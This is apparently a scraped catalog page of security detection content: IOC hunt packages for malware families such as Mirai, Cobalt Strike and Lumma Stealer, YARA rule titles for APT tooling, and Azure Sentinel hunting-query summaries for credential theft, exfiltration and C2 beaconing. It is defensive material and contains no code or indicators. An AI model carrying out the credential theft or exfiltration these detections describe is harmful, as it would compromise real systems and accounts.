ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 14 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 8 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 38 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 14 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

Hunt package for 9 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox source
DnsEvents

The "Unknown Stealer" malware is a data exfiltration tool designed to steal sensitive information such as credentials, browser data, and system configurations from infected hosts. It typically arrives via phishing emails containing malicious links or compromised domains that redirect users

infostealeriocthreatfoxunknown_stealer
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with ACR Stealer

infostealeriocthreatfoxwin-acr_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with CASTLELOADER

iocthreatfoxwin-castleloader
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 22 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with HijackLoader

iocthreatfoxwin-hijackloader
ThreatFox source
UrlClickEvents

Hunt package for 8 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with SnappyClient

iocthreatfoxwin-snappy_client
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 14 IOCs associated with VShell

iocthreatfoxwin-vshell
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 176-65-148-144

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 54 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 62-60-226-159

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as d52f85

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as malware_download

iocurlhaus
Yara-Rules source

Detects an operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ

backdoorcommunity
Yara-Rules source

Detects an operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ

backdoorcommunity
Yara-Rules source

Detects an operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ

backdoorcommunity
Yara-Rules source

Detects an operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ

backdoorcommunity
Yara-Rules source

YARA rule: apt_all_JavaScript_ScanboxFramework_obfuscated

aptcommunity
Yara-Rules source

YARA rule: dubseven_dropper_dialog_remains

community
Yara-Rules source

YARA rule: dubseven_dropper_registry_checks

community
Yara-Rules source

YARA rule: dubseven_file_set

community
maindll mutex
yara low
Yara-Rules source

YARA rule: maindll_mutex

community
Azure-Sentinel source
T1098

'This hunting query identifies new domains added to the domain login whitelist in Zoom.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078

'This hunting query identifies users joining a meeting from a time zone that a user has not been observed from in the last 30 days.'

huntingmicrosoftofficial
Yara-Rules source

Detects a specific config file used by malware in RUAG APT case

aptcommunity
Yara-Rules source

Detects a config text file used by malware Cobra in RUAG case

community
Yara-Rules source

The RUAG_Cobra_Malware YARA rule detects

community
Yara-Rules source

Detects a config text file used in data exfiltration in RUAG case

backdoorcommunity
Yara-Rules source

Detects an embedded executable with a malformed header - known from Tavdig malware

community
Yara-Rules source

YARA rule: SLServer_campaign_code

community
Yara-Rules source

YARA rule: SLServer_command_and_control

community
Yara-Rules source

YARA rule: SLServer_dialog_remains

community
SLServer mutex
yara low
Yara-Rules source

YARA rule: SLServer_mutex

community
Yara-Rules source

YARA rule: SLServer_unknown_string

community
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 29 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: Mozi IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 19 IOCs associated with Mozi

elf-moziiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents

Hunt package for 13 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 58 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 3 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox: AMOS IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with AMOS

iocosx-amosthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 2 IOCs associated with Amadey

iocthreatfoxwin-amadey
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 10 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Vidar malware is a data exfiltration tool designed to steal credentials and sensitive information from compromised systems. It typically arrives via phishing emails or malicious websites, leveraging URLs to deliver payloads or establish command-and-control communication. SOC

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 16 IOCs associated with VShell

iocthreatfoxwin-vshell
Yara-Rules source

This sample was pulled from the BAE Systems Snake campaign report. The Turla dropper creates a file in the temp dir and registers an auto start service call \

community
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as 282234

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 16 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "sh" malware family is likely used for initial access and command-and-control (C2) communication, leveraging stolen credentials or exploit kits

iocurlhaus
Yara-Rules source

Symantec Waterbug Attack - FA malware variant

community
Yara-Rules source

Symantec Waterbug Attack - SAV Malware

community
Yara-Rules source

Symantec Waterbug Attack - Trojan Turla DLL

backdoorcommunity
Yara-Rules source

Symantec Waterbug Attack - Trojan Turla Dropper

backdoorcommunity
Yara-Rules source

Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error

backdoorcommunityexploit
Yara-Rules source

Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF

backdoorcommunity
Yara-Rules source

Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component

backdoorcommunity
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Detects when a privileged user account successfully authenticates to another Microsoft Entra ID Tenant. Authentication attempts should be investigated to ensure the activity was legitimate and

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'This query over Microsoft Entra ID sign-in activity highlights Microsoft Entra ID apps with an unusually high ratio of distinct geolocations versus total number of authentications'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'This query examines Microsoft Entra ID sign-ins for each application and identifies the most anomalous change in a user's location profile. The goal is to detect user account compromise, possibly via

huntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'This query examines Microsoft Entra ID sign-ins and identifies anomalous changes in a user's location profile. A variation joins results back onto the original sign-in data to review the location set

huntingmicrosoftofficial
Yara-Rules source

Sofacy Malware - German Bundestag

community
Azure-Sentinel source
T1071T1571

'Query identifies beaconing patterns from Wire Data logs. Uses KQL functions to calculate time delta and find beaconing percentage. Results of beaconing to untrusted public networks can be investigate

cobalt-strikehuntingmicrosoftofficial
Azure-Sentinel source
T1110
SigninLogsSyslog

'Query finds accounts recorded as disabled by AD in previous time period but still using proxy in current time period. Presumes default squid log format is used. http://www.squid-cache.org/Doc/config/

huntingmicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'This query will detect suspicious paths associated with ProxyLogon exploitation'

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'This query will detect suspicious paths associated with ProxyLogon exploitation; it will then calculate the percentage of suspicious URIs the user had visited in relation to the total number of URIs

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Access attempts to Azure Portal from an unauthorized user. Either invalid password or the user account does not exist.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078
AuditLogsBehaviorAnalyticsSigninLogs

'Query for new sign-ins from stale/inactive accounts. UEBA filters based on ActivityInsights. Results for accounts created in the last 7 days are filtered out.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078
BehaviorAnalyticsIdentityInfoSigninLogs

'An account could be blocked if there are too many failed authentication attempts in a row. This hunting query identifies if a MFA user account that is set to blocked tries to login to Microsoft Entra

huntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Query over SigninLogs summarizes login attempts per hour on weekdays. Kusto anomaly detection finds login spikes. Calculates percentage change between anomalous period and average logins. Determines

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078T1078.004T1110T1110.004T1110.003
SigninLogs

'This hunting query will identify instances where a single user account has seen a high incidence of failed attempts from highly volatile IP addresses. Changing IP address for every password attempt i

huntingmicrosoftofficial
MFA Spamming
kql medium
Azure-Sentinel source
T1078
SigninLogs

'Identifies the list of users impacted by MFA Spamming within a given time window. The default failure count is 10 and the default time window is 5 minutes'

huntingmicrosoftofficial
Azure-Sentinel source
T1110
SigninLogs

'Highlights accounts associated with multiple authentications from different geographical locations in a short period of time.'

huntingmicrosoftofficial
Azure-Sentinel source
T1531
AuditLogs

'Looks for multiple users that had their admin role removed by a single user within a certain period. The default threshold is 5 removals, this can be edited in the query.'

huntingmicrosoftofficial
Azure-Sentinel source
T1110
W3CIISLog

'Query shows 1200+ failed attempts by cIP per hour on server, then successful logon. Only includes > 1 user agent string or port. Could indicate successful probing and brute force success on IIS serve

huntingmicrosoftofficial
Azure-Sentinel source
T1189T1190
W3CIISLog

'Potential code injection into web server roles via IIS logs scan. Represents attempt to gain initial access using drive-by compromise technique. Detection flags events for review and filtering of aut

huntingmicrosoftofficial
Azure-Sentinel source
T1068

'This query detects a process that runs under SYSTEM user's security context and was spawned by a process that was running under a lower security context indicating an exploitation for privilege escal

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1055.013
SecurityEvent

'This query detects Process Doppelganging, a technique that calls several APIs related to NTFS transactions which allow to substitute the PE content before the process is even created. Ref: https://at

huntingmicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'This will check for Rare User Agent strings over the last 3 days. This can indicate potential probing of your IIS servers.'

huntingmicrosoftofficial
Azure-Sentinel source
T1053
SecurityEvent

'The query detects a scheduled task, created/updated remotely, using the Schtasks process. Threat actors are using scheduled tasks for establishing persistence and moving laterally through the networ

huntingmicrosoftofficialpersistence
RID Hijacking
kql medium
Azure-Sentinel source
T1078
SecurityEvent

'This query detects all authentication attempts of non-administrator accounts whose RID ends in *-500. Ref: https://stealthbits.com/blog/rid-hijacking-when-guests-become-admins/'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'This alerts when a client IP connects with 1-15 different useragents in less than 1 hour. Limited to 50 or less connections to avoid high traffic. May indicate malicious activity as a probing method.

huntingmicrosoftofficial
Azure-Sentinel source
T1087T1021
SigninLogs

'This identifies when a user account successfully logs onto a given App and within 1 minute fails to logon to a different App. This may indicate a malicious attempt at accessing disallowed Apps for di

huntinglateral-movementmicrosoftofficial
Azure-Sentinel source
T1078T1098
SigninLogs

'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. This analytic will additionally identify the successful signed in accounts a

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
SigninLogs

'Example query for SigninLogs showing how to break out packed fields. In this case extending conditional access Policies '

huntingmicrosoftofficial
Smart Lockouts
kql medium
Azure-Sentinel source
T1078.004
SigninLogs

'Identifies accounts that have been locked out by smart lockout policies. Review these results for patterns that might suggest that a password spray is triggering these smart lockout events. Ref : http

backdoorhuntingmicrosoftofficial
Yara-Rules source

Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe

community
Azure-Sentinel source
T1078.004
SigninLogs

'Identifies spikes in failed sign-in events based on the volume of failed sign-in events over time. Use to identify patterns of suspicious behavior such as unusually high failed sign-in attempts from

backdoorhuntingmicrosoftofficial
Yara-Rules source

The YARA rule 'StoneDrill_main_sub' detects decrypted StoneDrill malware samples, aiding in identifying active or recently decrypted instances of this ransom

community
Yara-Rules source

Generic detection for samples that enumerate files with encrypted resource called 101

backdoorcommunity
Azure-Sentinel source
T1567
W3CIISLog

'The hunting query looks for suspicious files accessed on an IIS server that might indicate exfiltration hosting. This technique has been observed when exporting mailbox files from OWA servers.'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1110
AADNonInteractiveUserSignInLogsSigninLogs

'Summarizes all the failure and success events for all users in the last 24 hours, identifying only users with more than 100 failures in the set period'

huntingmicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'Looks for activity that might indicate exploitation of the ProxyToken vulnerability - CVE-2021-33766 Ref: https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-micro

evasionexploithuntingmicrosoftofficial
Azure-Sentinel source
T1218
SecurityEvent

'This query identifies Microsoft-signed Binaries and Scripts that are not system initiated. This technique is commonly used in phishing attacks'

huntingmicrosoftofficialphishing
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

The Mirai malware family compromises IoT devices by exploiting

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: Tsunami IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Tsunami

elf-tsunamiiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 33 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 3 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 55 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 7 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox source
DnsEvents

The "Unknown Stealer" malware is designed to exfiltrate sensitive data, including credentials and system information, from infected hosts. It typically arrives via phishing emails containing malicious links or attachments that deploy the payload through compromised domains. SOC analysts should monitor for unusual outbound traffic to the associated domains, anomalous credential access attempts

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Brute Ratel C4

backdooriocthreatfoxwin-brute_ratel_c4
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a Remote Access Trojan that enables adversaries to exfiltrate data, execute commands, and maintain persistence within compromised systems. It typically arrives via phishing emails containing malicious attachments or exploit kits

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with PureLogs Stealer

infostealeriocthreatfoxwin-purelogs
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 10 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 23 IOCs associated with VShell

iocthreatfoxwin-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

XWorm is

iocthreatfoxwin-xworm
Azure-Sentinel source
T1190
W3CIISLog

'This finds connections to server files requested by only one client. Effective when an actor uses static operational IP addresses. The threshold can be modified. A larger execution window increases reliabilit

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as 176-65-139-121

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

ClearFake malware is designed to exfiltrate sensitive data and establish command-and-control (C2) communication, often leveraging

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as dropped-by-Phorpiex

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1078
AADNonInteractiveUserSignInLogsSigninLogs

'An account could be blocked/locked out for multiple reasons. This hunting query summarizes blocked/locked-out accounts and checks whether the most recent sign-in events for them are after the last blocked accounts R

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs

' Identifies a measurable increase in successful sign-ins from user accounts. The spike is determined based on a time series anomaly, which looks at historical baseline values. Ref : https://docs.microsof

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078

'Query identifies users denied registration for multiple webinars or recordings but successfully registered for at least one event. The threshold variable adjusts the number of events a user needs to be rejecte

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1552
SecurityEvent

'This detection uses Windows security events to look for users reading the local Device Identity Key (Machine Key). This information can be correlated with other events for additional context and get

huntingmicrosoftofficial
Azure-Sentinel source
T1529

'This detection uses Sysmon telemetry to detect System Shutdown/Reboot (MITRE Technique: T1529)'

huntingmicrosoftofficial
Azure-Sentinel source
T1542

'This hunting query identifies Zoom room systems with high CPU alerts that may be a sign of device compromise.'

huntingmicrosoftofficial
AD Account Lockout
kql medium
Azure-Sentinel source
T1531
SecurityEvent

'Detects Active Directory account lockouts'

huntingmicrosoftofficial
Azure-Sentinel source
T1005

'This hunting query uses Application events from the "MSSQL$MICROSOFT##WID" provider to collect SQL statements run against an AD FS database (e.g. the Windows Internal Database (WID)). A threat actor might

backdoorcredential-thefthuntingmicrosoftofficial
Alerts On Host
kql medium
Azure-Sentinel source
SecurityAlert

'Any Alerts that fired on a given host during the range of +6h and -3d'

huntingmicrosoftofficial
Azure-Sentinel source
SecurityAlert

'Any Alerts that fired related to a given account during the range of +6h and -3d'

huntingmicrosoftofficial
Azure-Sentinel source
SecurityAlert

'Any Alerts that fired related to a given File during the range of +6h and -3d'

huntingmicrosoftofficial
Azure-Sentinel source
SecurityAlert

'Any Alerts that fired related to a given IpAddress during the range of +6h and -3d'

huntingmicrosoftofficial
Azure-Sentinel source
SecurityAlert

'Any Alerts that fired on any host with this same process in the range of +-1d'

huntingmicrosoftofficial
Yara-Rules source

Rule to detect ProjectSauron encrypted LSA samples

community
Yara-Rules source

Rule to detect encrypted ProjectSauron SSPI samples

community
Yara-Rules source

Rule to detect ProjectSauron generic pipe backdoors

backdoorcommunity
Yara-Rules source

The YARA rule 'apt_ProjectSauron_pipe_backdoor' detects malicious

backdoorcommunity
Yara-Rules source

Rule to detect Regin 32 bit stage 1 loaders

community
Yara-Rules source

Rule to detect Regin 64 bit stage 1 loaders

community
Yara-Rules source

Rule to detect Regin disp.dll dispatcher

community
Yara-Rules source

Rule to detect Regin's Hopscotch module

community
Yara-Rules source

Rule to detect Regin's Legspin module

community
Yara-Rules source

Rule to detect Regin RC5 decryption keys

community
Yara-Rules source

Rule to detect Regin VFSes

community
Azure-Sentinel source
T1190
SecurityAlertW3CIISLog

'This query will dynamically identify Exchange servers using common web paths used by the application in the csUriStem. The query will then collect MDE alerts from the SecurityAlert table using the id

huntingmicrosoftofficial
Azure-Sentinel source
T1041T1071
SecurityEvent

'This query looks for command lines that contain a public IP address. Attackers may use a hard coded IP for C2 or exfiltration. This query can be filtered to exclude network prefixes that are known

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078
SecurityEventSigninLogs

'This query looks at Account Logon events found through Windows Event IDs as well as SigninLogs to discover login attempts by accounts that have expired.'

huntingmicrosoftofficial
Azure-Sentinel source
T1110
AuditLogsSigninLogs

'User account failed to log on in the current period. Excludes Windows sign-in attempts and limits results to accounts with more than 10 failed logons or 3 different IPs used. Results may indicate a potential malicious use

huntingmicrosoftofficial
Azure-Sentinel source
T1564
SecurityEvent

'This query detects authentication attempts from a fake computer account (username ends with $). Computer accounts do not normally authenticate via interactive logon or remote desktop, nor do they a

huntingmicrosoftofficial
Azure-Sentinel source
T1071.001
CommonSecurityLog

'This composite hunting query will highlight any HTTP traffic in CommonSecurityLog web proxies (such as ZScaler) that match known patterns used by red teaming tools potentially stolen from FireEye. Mo

huntingmicrosoftofficial
Azure-Sentinel source
T1556
AuditLogsSigninLogs

This query shows authentication methods being added and devices registered around the time of a high risk sign in which could indicate an attempt to establish persistence on a compromised account. The

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source
T1074
CloudAppEventsSecurityAlert

"This query searches for any files in Cloud App Events that have triggered a security alert."

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1484
SecurityEvent

'This query detects lateral movement using GPO scheduled task usually used to deploy ransomware at scale. It monitors whether a scheduled task is modified within the Sysvol folder in GPO. Ref: https

huntinglateral-movementmicrosoftofficialpersistenceransomware
Yara-Rules source

Red Leaves malware, related to APT10

aptcommunity
Yara-Rules source

Red Leaves C&C left in memory, use with Volatility / Rekall

community
Azure-Sentinel source
T1114T1020T1078
OfficeActivitySigninLogs

'This query helps detect a new Microsoft Entra ID sign-in from a new location, correlating it with Office Activity data to highlight cases where user mail is being forwarded, and shows whether it is being forw

huntingmicrosoftofficial
Azure-Sentinel source
T1110
OfficeActivitySigninLogs

'This identifies failed logon attempts using permutations based on known first and last names within 10m time windows. Iteration through separators or order changes in the logon name may indicate pote

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1074.001
DeviceProcessEventsSecurityEventWindowsEventimProcessCreate

'This hunting query looks for potential command injection attempts via the vulnerable third-party driver against Azure IR with Managed VNet or SHIR processes as well as post-exploitation activity base

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
T1133

'Azure AD Connect (AAD Connect) is a critical service that handles connections between on-premises Active Directory and Azure AD. Due to the critical nature of AAD Connect, threat actors may attempt to

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogsBehaviorAnalyticsIdentityInfo

'Identifies where Privileged Accounts have updated passwords or security information. This is joined with UEBA alerts to filter to only those accounts with a high investigation priority. Ref : https:/

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Identifies privileged accounts that have been locked out. Verify these lockouts are due to legitimate user activity and not due to threat actors attempting to access the accounts. Ref : https://docs.m

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1190T1087T1114
AuditLogsOfficeActivitySigninLogs

'This script identifies rare domain accounts accessing cloud resources by examining logs. You can lower the domainLimit value to see domains with fewer access attempts. For example, set domainLimit =

huntingmicrosoftofficial
Azure-Sentinel source
T1204
DeviceProcessEventsSecurityEvent

This query will show rare firewall rule changes made using the netsh utility by comparing rule names and program names from the previous day with those from the historical chosen time frame. - This technique w

